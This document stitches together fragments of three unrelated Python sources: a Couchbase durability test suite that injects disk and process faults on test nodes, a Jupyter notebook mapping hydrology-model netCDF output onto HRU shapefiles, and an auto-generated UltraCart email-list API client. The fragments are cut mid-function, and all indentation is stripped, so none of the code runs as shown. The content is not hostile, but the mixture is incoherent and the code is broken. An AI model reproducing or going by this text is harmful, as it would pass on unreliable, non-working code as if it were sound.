MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
load_spec["doc_crud"][
MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][MetaCrudParams.DocCrud.COMMON_DOC_KEY] \
= "test_collections"
self.log.info("Perform 'create', 'update', 'delete' mutations")
doc_loading_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
load_spec,
mutation_num=2,
async_load=True)
# Perform new scope/collection creation during doc ops in parallel
self.__perform_collection_crud(verification_dict=verification_dict)
# Wait for doc_loading to complete
self.task_manager.get_task_result(doc_loading_task)
self.bucket_util.validate_doc_loading_results(doc_loading_task)
if doc_loading_task.result is False:
self.log_failure("Doc CRUDs failed")
self.validate_test_failure()
self.log.info("Validating doc_count in buckets")
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
# Validate vbucket stats
self.update_verification_dict_from_collection_task(verification_dict,
doc_loading_task)
failed = self.durability_helper.verify_vbucket_details_stats(
self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
vbuckets=self.cluster.vbuckets,
expected_val=verification_dict)
if failed:
self.fail("Cbstat vbucket-details verification failed")
self.validate_cruds_from_collection_mutation(doc_loading_task)
def test_with_persistence_issues(self):
"""
Test to make sure timeout is handled in durability calls
and document CRUDs are successful even with disk related failures
1. Select nodes from the cluster to simulate the specified error
2. Perform CRUD on the target bucket with given timeout
3. Using cbstats to verify the operation succeeds
4. Validate all mutations are succeeded
Note: self.sdk_timeout value is considered as 'seconds'
"""
if self.durability_level in [
Bucket.DurabilityLevel.MAJORITY_AND_PERSIST_TO_ACTIVE,
Bucket.DurabilityLevel.PERSIST_TO_MAJORITY]:
self.log.critical("Test not valid for persistence durability")
return
error_sim = dict()
shell_conn = dict()
cbstat_obj = dict()
failover_info = dict()
vb_info_info = dict()
active_vbs_in_target_nodes = list()
failover_info["init"] = dict()
failover_info["afterCrud"] = dict()
vb_info_info["init"] = dict()
vb_info_info["afterCrud"] = dict()
self.log.info("Selecting nodes to simulate error condition")
target_nodes = DurabilityHelper.getTargetNodes(self.cluster,
self.nodes_init,
self.num_nodes_affected)
self.log.info("Simulate error condition on %s" % target_nodes)
for node in target_nodes:
shell_conn[node.ip] = RemoteMachineShellConnection(node)
cbstat_obj[node.ip] = Cbstats(shell_conn[node.ip])
active_vbs_in_target_nodes += cbstat_obj[node.ip].vbucket_list(
self.bucket.name,
"active")
vb_info_info["init"][node.ip] = cbstat_obj[node.ip].vbucket_seqno(
self.bucket.name)
failover_info["init"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
if self.simulate_error \
in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
error_sim = DiskError(self.log, self.task_manager,
self.cluster.master, target_nodes,
60, 0, False, 120,
disk_location="/data")
error_sim.create(action=self.simulate_error)
else:
for node in target_nodes:
# Create shell_connections
shell_conn[node.ip] = RemoteMachineShellConnection(node)
# Perform specified action
error_sim[node.ip] = CouchbaseError(self.log,
shell_conn[node.ip])
error_sim[node.ip].create(self.simulate_error,
bucket_name=self.bucket.name)
# Perform CRUDs with induced error scenario is active
load_spec = dict()
load_spec["doc_crud"] = dict()
load_spec["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
load_spec["doc_crud"][
MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
self.log.info("Perform 'create', 'update', 'delete' mutations")
doc_loading_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
load_spec,
mutation_num=1,
async_load=True)
# Perform new scope/collection creation during doc ops in parallel
self.__perform_collection_crud(mutation_num=2)
# Wait for doc_loading to complete and validate the doc ops
self.task_manager.get_task_result(doc_loading_task)
self.bucket_util.validate_doc_loading_results(doc_loading_task)
if doc_loading_task.result is False:
self.log_failure("Doc CRUDs failed with persistence issue")
if self.simulate_error \
in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
error_sim.revert(self.simulate_error)
else:
# Revert the induced error condition
for node in target_nodes:
error_sim[node.ip].revert(self.simulate_error,
bucket_name=self.bucket.name)
# Disconnect the shell connection
shell_conn[node.ip].disconnect()
self.sleep(10, "Wait for node recovery to complete")
# Doc count validation
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
# Fetch latest failover stats and validate the values are updated
self.log.info("Validating failover and seqno cbstats")
for node in target_nodes:
vb_info_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].vbucket_seqno(self.bucket.name)
failover_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Failover validation
val = \
failover_info["init"][node.ip] \
== failover_info["afterCrud"][node.ip]
error_msg = "Failover stats got updated"
self.assertTrue(val, msg=error_msg)
# Seq_no validation (High level)
val = \
vb_info_info["init"][node.ip] \
!= vb_info_info["afterCrud"][node.ip]
self.assertTrue(val, msg="vbucket seq_no not updated after CRUDs")
self.validate_test_failure()
# Doc count validation
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
def test_with_process_crash(self):
"""
Test to make sure durability will succeed even if a node goes down
due to crash and has enough nodes to satisfy the durability
1. Select a node from the cluster to simulate the specified error
2. Perform CRUD on the target bucket with given timeout
3. Using cbstats to verify the operation succeeds
4. Validate all mutations are succeeded
Note: self.sdk_timeout values is considered as 'seconds'
"""
if self.num_replicas < 2:
self.assertTrue(False, msg="Required: num_replicas > 1")
# Override num_of_nodes affected to 1 (Positive case)
self.num_nodes_affected = 1
error_sim = dict()
shell_conn = dict()
cbstat_obj = dict()
failover_info = dict()
vb_info_info = dict()
active_vbs_in_target_nodes = list()
failover_info["init"] = dict()
failover_info["afterCrud"] = dict()
vb_info_info["init"] = dict()
vb_info_info["afterCrud"] = dict()
self.log.info("Selecting nodes to simulate error condition")
target_nodes = DurabilityHelper.getTargetNodes(self.cluster,
self.nodes_init,
self.num_nodes_affected)
self.log.info("Will simulate error condition on %s" % target_nodes)
for node in target_nodes:
shell_conn[node.ip] = RemoteMachineShellConnection(node)
cbstat_obj[node.ip] = Cbstats(shell_conn[node.ip])
active_vbs_in_target_nodes += cbstat_obj[node.ip].vbucket_list(
self.bucket.name,
"active")
vb_info_info["init"][node.ip] = cbstat_obj[node.ip].vbucket_seqno(
self.bucket.name)
failover_info["init"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Remove active vbuckets from doc_loading to avoid errors
load_spec = dict()
load_spec["doc_crud"] = dict()
load_spec["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
load_spec["doc_crud"][
MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
load_spec["target_vbuckets"] = list(set(range(0, 1024))
^ set(active_vbs_in_target_nodes))
self.log.info("Perform 'create', 'update', 'delete' mutations")
doc_loading_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
load_spec,
mutation_num=1,
async_load=True)
self.sleep(5, "Wait for doc loaders to start loading data")
for node in target_nodes:
# Create shell_connections
shell_conn[node.ip] = RemoteMachineShellConnection(node)
# Perform specified action
error_sim[node.ip] = CouchbaseError(self.log,
shell_conn[node.ip])
error_sim[node.ip].create(self.simulate_error,
bucket_name=self.bucket.name)
# Perform new scope/collection creation during doc ops in parallel
self.__perform_collection_crud()
# Wait for document_loader tasks to complete
self.task_manager.get_task_result(doc_loading_task)
self.bucket_util.validate_doc_loading_results(doc_loading_task)
if doc_loading_task.result is False:
self.log_failure("Doc CRUDs failed with process crash")
if self.simulate_error \
not in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
# Revert the induced error condition
for node in target_nodes:
error_sim[node.ip].revert(self.simulate_error,
bucket_name=self.bucket.name)
# Disconnect the shell connection
shell_conn[node.ip].disconnect()
self.sleep(10, "Wait for node recovery to complete")
# In case of error with Ephemeral bucket, need to rebalance
# to make sure data is redistributed properly
if self.bucket_type == Bucket.Type.EPHEMERAL:
retry_num = 0
result = None
while retry_num != 2:
result = self.task.rebalance(
self.servers[0:self.nodes_init],
[], [])
if result:
break
retry_num += 1
self.sleep(10, "Wait before retrying rebalance")
self.assertTrue(result, "Rebalance failed")
# Fetch latest failover stats and validate the values are updated
self.log.info("Validating failover and seqno cbstats")
for node in target_nodes:
vb_info_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].vbucket_seqno(self.bucket.name)
failover_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Failover stat validation
if self.simulate_error == CouchbaseError.KILL_MEMCACHED:
val = failover_info["init"][node.ip] \
!= failover_info["afterCrud"][node.ip]
else:
if self.simulate_error != CouchbaseError.STOP_MEMCACHED \
and self.bucket_type == Bucket.Type.EPHEMERAL:
val = failover_info["init"][node.ip] \
!= failover_info["afterCrud"][node.ip]
else:
val = failover_info["init"][node.ip] \
== failover_info["afterCrud"][node.ip]
error_msg = "Failover stats mismatch after error condition:" \
" %s != %s" \
% (failover_info["init"][node.ip],
failover_info["afterCrud"][node.ip])
self.assertTrue(val, msg=error_msg)
# Seq_no validation (High level)
val = \
vb_info_info["init"][node.ip] \
!= vb_info_info["afterCrud"][node.ip]
self.assertTrue(val, msg="vbucket seq_no not updated after CRUDs")
# Doc count validation
self.validate_test_failure()
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
def test_non_overlapping_similar_crud(self):
"""
Test to run non-overlapping durability cruds on single bucket
and make sure all CRUD operation succeeds
1. Run single task_1 with durability operation
2. Create parallel task to run either SyncWrite / Non-SyncWrite
operation based on the config param and run that over the docs
such that it will not overlap with other tasks
3. Make sure all CRUDs succeeded without any unexpected exceptions
"""
# Stat validation reference variables
verification_dict = dict()
verification_dict["ops_create"] = 0
verification_dict["ops_update"] = 0
verification_dict["ops_delete"] = 0
verification_dict["rollback_item_count"] = 0
verification_dict["sync_write_aborted_count"] = 0
verification_dict["sync_write_committed_count"] = 0
for _, scope in self.bucket.scopes.items():
for _, collection in scope.collections.items():
verification_dict["ops_create"] += collection.num_items
if self.durability_level in self.supported_d_levels:
verification_dict["sync_write_committed_count"] \
+= collection.num_items
failed = self.durability_helper.verify_vbucket_details_stats(
self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
vbuckets=self.cluster.vbuckets,
expected_val=verification_dict)
if failed:
self.fail("Cbstat vbucket-details verification failed")
doc_ops = self.input.param("doc_ops", "create")
# Reset initial doc_loading params to NO_OPS
doc_load_template = \
self.bucket_util.get_crud_template_from_package("initial_load")
doc_load_template[MetaCrudParams.DURABILITY_LEVEL] = ""
doc_load_template[MetaCrudParams.COLLECTIONS_CONSIDERED_FOR_CRUD] = 3
doc_load_template["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 0
doc_load_template["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
# | |
<reponame>pnorton-usgs/notebooks
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit]
# language: python
# name: conda-env-bandit-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
# %matplotlib inline
from __future__ import (absolute_import, division, print_function)
from future.utils import iteritems
import netCDF4 as cf
import pandas as pd
from datetime import datetime
from calendar import monthrange
from collections import namedtuple
import matplotlib as mpl
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize, LogNorm, PowerNorm
# mpl.use('Agg')
# from matplotlib.backends.backend_pdf import PdfPages
from mpl_toolkits.axes_grid1 import make_axes_locatable
# see https://github.com/matplotlib/basemap/issues/354
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import numpy as np
import os
import pyproj as prj
from osgeo import ogr
import sys
# %%
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/fortran/prms6/tests/red_river_of_the_south/output'
# filename = '{}/nhru_out_meanmonthly.nc'.format(work_dir)
# work_dir = '/Users/pnorton/tmp'
# filename = '{}/BCCA_0-125deg_tasmin_day_ACCESS1-0_historical_r1i1p1.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/bandit/jobs/20190425_red_river'
# filename = '{}/daymet_v3_cbh.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/daymet_v3_1980-01-01_2016-12-31/tmp'
# filename = '{}/daymet_v3_cbh_tmin_20150101-20151231.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/fortran/converters'
# filename = '{}/tmaxf.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/datasets/NHM_output/netcdf'
# filename = '{}/dprst_stor_hru.nc'.format(work_dir)
work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/conus/output'
filename = '{}/summary_daily.nc'.format(work_dir)
# work_dir = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks'
# filename = '{}/test1.nc'.format(work_dir)
first_time = True
# %%
fhdl = cf.Dataset(filename, 'r')
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Get the size of the unlimited record dimension
dimensions = fhdl.dimensions
recdims = namedtuple('recdim', 'name, size')
print("======= Dimensions =======")
for xx, yy in dimensions.items():
if yy.isunlimited():
print('%s: %d (unlimited)' % (xx, len(yy)))
recdim = recdims(name=xx, size=len(yy))
else:
if xx in ['time']:
# Found a limited record dimension
print('Fixed dimension, {}'.format(xx))
recdim = recdims(name=xx, size=len(yy))
print('%s: %d' % (xx, len(yy)))
# %%
# print("======= Variables =======")
# for xx in fhdl.variables:
# print(xx)
# %%
d0units = fhdl.variables[recdim.name].units
print(d0units)
try:
d0calendar = fhdl.variables[recdim.name].calendar
print(d0calendar)
except KeyError:
print('calendar attribute missing, assuming standard calendar')
d0calendar = 'standard'
# %%
cblabel = 'pkwater_equiv'
time_idx = 100
# Read the time values into a list
timelist = cf.num2date(fhdl.variables[recdim.name][:], units=d0units, calendar=d0calendar)
# print(timelist)
# Create dataframe of the output variable
data_var = fhdl.variables[cblabel]
# Set the min and max values allowed - right now we just take the min and max of the dataframe values
min_val = np.min(data_var)
max_val = np.max(data_var)
val_rng = max_val - min_val
# var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# # Create dataframe of nhm_id
# # nhm_id_var = fhdl.variables['hru']
# nhm_id_var = fhdl.variables['nhm_id']
# # nhm_id_var = fhdl.variables['hru_feature_id']
# nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# # Create a DataFrame of the output variable
# # df = var_df.merge(nhm_df, left_index=True, right_index=True)
# # df.set_index('nhru', inplace=True)
# df = var_df.join(nhm_df).set_index('nhru').sort_index()
# print(df.head())
# print(df.info())
# %%
timelist[time_idx].isoformat()
# %%
# Create the colormap
# cmap = 'BrBG' #'GnBu_r' # for snow
# cmap = 'GnBu_r'
cmap = 'jet'
# create the colormap if a list of names is given, otherwise
# use the given colormap
lscm = mpl.colors.LinearSegmentedColormap
if isinstance(cmap,(list,tuple)):
cmap = lscm.from_list('mycm', cmap)
else:
cmap = plt.get_cmap(cmap)
missing_color = '#ff00cb' # pink/magenta
# ### Read in parameter file and create dataframe of selected parameter from the NHM parameter database
# #### <I>Min and max values for range are currently hardcoded or selected from the range of parameter values. <br>It would be better to read accepted range information from an xml file for the parameters.</I>
# TODO: Lookup dimensions for given parameter use that to select segment IDs or HRU IDs
# for the index column. If parameter is 2D (e.g. nhru x nmonths) then use the
# second dimension to loop and create one plot/map for each value of the second
# dimension.
# # Set the min and max values allowed - right now we just take the min and max of the dataframe values
# min_val = df.min().min()
# # max_val = 10.
# max_val = df.max().max()
# val_rng = max_val - min_val
# ### Get extent information from the national HRUs shapefile
# Need two shapefiles 1) in projected coordinates, 2) in geographic coordinates
# If gdal is installed can create geographic coordinates from projected with:
# ogr2ogr -t_srs epsg:4326 output_wgs84.shp input.shp
# shpfile = '/Users/pnorton/Projects/National_Hydrology_Model/extraction_requests/20180307_red_river/GIS/HRU_subset_nad83.shp'
# shpfile_extent = '/Users/pnorton/Projects/National_Hydrology_Model/extraction_requests/20180307_red_river/GIS/HRU_subset_usaea.shp'
shpfile = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks/GIS/all_nhru_simple/nhruNationalIdentifier.shp'
shpfile_extent = '/Users/pnorton/Projects/National_Hydrology_Model/notebooks/GIS/all_nhru_simple_usaea/nhruNationalIdentifier.shp'
# Name of attribute to use. Change to match the name of the HRU id attribute in the shapefile
shape_key='hru_id_nat'
# Use gdal/ogr to get the extent information
# Shapefile can be in projected coordinates
# Driver can be: OpenFileGDB or ESRI Shapefile
inDriver = ogr.GetDriverByName("ESRI Shapefile")
inDataSource = inDriver.Open(shpfile_extent, 0)
inLayer = inDataSource.GetLayer()
extent = inLayer.GetExtent()
# Get the spatial reference information from the shapefile
spatial_ref = inLayer.GetSpatialRef()
# Create transformation object using projection information from the shapefile
xform = prj.Proj(spatial_ref.ExportToProj4())
west, east, south, north = extent
pad = 100000. # amount to pad the extent values with (in meters)
#east += pad
#west -= pad
#south -= pad
#north += pad
LL_lon, LL_lat = xform(west, south, inverse=True)
UR_lon, UR_lat = xform(east, north, inverse=True)
print('\tExtent: ({0:f}, {1:f}, {2:f}, {3:f})'.format(west, east, south, north))
print('\tExtent: (LL: [{}, {}], UR: [{}, {}])'.format(LL_lon, LL_lat, UR_lon, UR_lat))
# Matplotlib basemap requires the map center (lon_0, lat_0) be in decimal degrees
# and yet the corners of the extent can be in projected coordinates
cen_lon, cen_lat = xform((east+west)/2, (south+north)/2, inverse=True)
# %%
time_idx = 75
var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# Create dataframe of nhm_id
# nhm_id_var = fhdl.variables['hru']
nhm_id_var = fhdl.variables['nhm_id']
# nhm_id_var = fhdl.variables['hru_feature_id']
nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# Create a DataFrame of the output variable
# df = var_df.merge(nhm_df, left_index=True, right_index=True)
# df.set_index('nhru', inplace=True)
df = var_df.join(nhm_df).set_index('nhru').sort_index()
print(df.head())
print(df.info())
# %%
# %%
# first_time = True
if df.shape[1] > 1:
print('Currently unable to handle 2D parameters')
else:
if first_time:
# Create the map figure
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
# ax = axes.flatten()
ax = axes
# ax = plt.gca()
# Load the basemap
m = Basemap(width=east-west, height=north-south, resolution='c',
projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
# draw parallels.
m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
# draw meridians
m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
m.drawmapboundary()
# ------------------------------------------------------------------
# Use basemap to read and draw the shapefile
# Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
# m.nhruDd contains the lines of the borders
# m.nhruDd_info contains the info on the hru, like the name
print('Read shapefile...')
m.readshapefile(os.path.splitext(shpfile)[0], 'nhruDd', drawbounds=False)
print('Create dataframe from shapefile')
df_poly = pd.DataFrame({'shapes': [Polygon(np.array(ss), closed=True) for ss in m.nhruDd],
'id': [aa[shape_key] for aa in m.nhruDd_info]})
print('Create plotting dataframe')
df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
print('Patch Collection')
pc = PatchCollection(df_plot.shapes, cmap=cmap, match_original=True, zorder=2)
norm = PowerNorm(gamma=0.05)
# if first_time:
# print('mapping...')
# mapper = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
# mapper.set_array(df_plot[cblabel])
# plt.colorbar(mapper, shrink=0.4)
if first_time:
ax.add_collection(pc)
if first_time:
print('facecolor')
# pc.set_array(df_plot[cblabel].fillna(-99).values)
pc.set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
else:
ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
plt.title('Variable: {}, Date: {}'.format(cblabel, timelist[time_idx].isoformat()))
fig.canvas.draw()
fig.canvas.flush_events()
first_time = False
# plt.show()
# %%
if df.shape[1] > 1:
print('Currently unable to handle 2D parameters')
else:
if first_time:
# Create the map figure
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
# ax = axes.flatten()
ax = axes
# ax = plt.gca()
# Load the basemap
m = Basemap(width=east-west, height=north-south, resolution='c',
projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
# draw parallels.
m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
# draw meridians
m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
m.drawmapboundary()
# ------------------------------------------------------------------
# Use basemap to read and draw the shapefile
# Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
# m.nhruDd contains the lines of the borders
# m.nhruDd_info contains the info on the hru, like the name
print('Read shapefile...')
m.readshapefile(os.path.splitext(shpfile)[0], 'nhruDd', drawbounds=False)
print('Create dataframe from shapefile')
df_poly = pd.DataFrame({'shapes': [Polygon(np.array(ss), closed=True) for ss in m.nhruDd],
'id': [aa[shape_key] for aa in m.nhruDd_info]})
print('Patch Collection')
pc = PatchCollection(df_poly.shapes, cmap=cmap, match_original=True, zorder=2)
norm = PowerNorm(gamma=0.05)
print('Create plotting dataframe')
df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
if first_time:
print('mapping...')
mapper = mpl.cm.ScalarMappable(norm=norm, cmap=cmap)
mapper.set_array(df_plot[cblabel])
plt.colorbar(mapper, shrink=0.4)
if first_time:
ax.add_collection(pc)
if first_time:
print('facecolor')
# pc.set_array(df_plot[cblabel].fillna(-99).values)
pc.set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
else:
ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
if first_time:
fig.canvas.draw()
plt.title('Variable: {}, Date: {}'.format(cblabel, timelist[time_idx].isoformat()))
# Output a png
# fig.savefig(outfile, dpi=250, bbox_inches='tight',debug=True)
# fig.clf()
# plt.close()
first_time = False
# %%
time_idx = 0
var_df = pd.DataFrame(data_var[time_idx, :], columns=[cblabel])
# Create dataframe of nhm_id
# nhm_id_var = fhdl.variables['hru']
nhm_id_var = fhdl.variables['nhm_id']
# nhm_id_var = fhdl.variables['hru_feature_id']
nhm_df = pd.DataFrame(nhm_id_var[:], columns=['nhru'])
# Create a DataFrame of the output variable
# df = var_df.merge(nhm_df, left_index=True, right_index=True)
# df.set_index('nhru', inplace=True)
df = var_df.join(nhm_df).set_index('nhru').sort_index()
print(df.head())
print(df.info())
df_plot = df_poly.merge(df, left_on='id', right_index=True, how='left')
ax.collections[0].set_facecolor(cmap(norm(df_plot[cblabel].fillna(-99).values)))
fig.canvas.draw()
fig.canvas.flush_events()
# %%
if df.shape[1] > 1:
print('Currently unable to handle 2D parameters')
else:
# Create the map figure
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(30,20))
# ax = axes.flatten()
ax = axes
# Load the basemap
m = Basemap(width=east-west, height=north-south, resolution='c',
projection='laea', lat_0=cen_lat, lon_0=cen_lon, ax=ax)
#m = Basemap(llcrnrlon=west, llcrnrlat=south, urcrnrlon=east, urcrnrlat=north, resolution='c',
#projection='laea', lat_0=(south+north)/2, lon_0=(east+west)/2, ax=ax)
# draw parallels.
m.drawparallels(np.arange(0.,90,10.), labels=[1,0,0,0], fontsize=20)
# draw meridians
m.drawmeridians(np.arange(180.,360.,10.), labels=[0,0,0,1], fontsize=20)
m.drawmapboundary()
# ------------------------------------------------------------------
# Use basemap to read and draw the shapefile
# Two variables are added to the basemap, m.nhruDd and m.nhruDd_info
# m.nhruDd contains the lines of the borders
# m.nhruDd_info contains the info on the hru, like the | |
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_customers(storefront_oid, email_list_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_uuid: (required)
:param int page_number:
:param int page_size:
:return: EmailListCustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, **kwargs) # noqa: E501
else:
(data) = self.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, **kwargs) # noqa: E501
return data
def get_email_list_customers_with_http_info(self, storefront_oid, email_list_uuid, **kwargs): # noqa: E501
"""Get email list customers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_customers_with_http_info(storefront_oid, email_list_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_uuid: (required)
:param int page_number:
:param int page_size:
:return: EmailListCustomersResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['storefront_oid', 'email_list_uuid', 'page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_list_customers" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'storefront_oid' is set
if ('storefront_oid' not in params or
params['storefront_oid'] is None):
raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_customers`") # noqa: E501
# verify the required parameter 'email_list_uuid' is set
if ('email_list_uuid' not in params or
params['email_list_uuid'] is None):
raise ValueError("Missing the required parameter `email_list_uuid` when calling `get_email_list_customers`") # noqa: E501
collection_formats = {}
path_params = {}
if 'storefront_oid' in params:
path_params['storefront_oid'] = params['storefront_oid'] # noqa: E501
if 'email_list_uuid' in params:
path_params['email_list_uuid'] = params['email_list_uuid'] # noqa: E501
query_params = []
if 'page_number' in params:
query_params.append(('pageNumber', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey'] # noqa: E501
return self.api_client.call_api(
'/storefront/{storefront_oid}/email/lists/{email_list_uuid}/customers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmailListCustomersResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_email_list_segment_folder(self, storefront_oid, email_list_segment_folder_uuid, **kwargs): # noqa: E501
"""Get email campaign folder # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_segment_folder(storefront_oid, email_list_segment_folder_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_segment_folder_uuid: (required)
:return: EmailListSegmentFolderResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, **kwargs) # noqa: E501
else:
(data) = self.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, **kwargs) # noqa: E501
return data
def get_email_list_segment_folder_with_http_info(self, storefront_oid, email_list_segment_folder_uuid, **kwargs): # noqa: E501
"""Get email campaign folder # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_list_segment_folder_with_http_info(storefront_oid, email_list_segment_folder_uuid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:param str email_list_segment_folder_uuid: (required)
:return: EmailListSegmentFolderResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['storefront_oid', 'email_list_segment_folder_uuid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_list_segment_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'storefront_oid' is set
if ('storefront_oid' not in params or
params['storefront_oid'] is None):
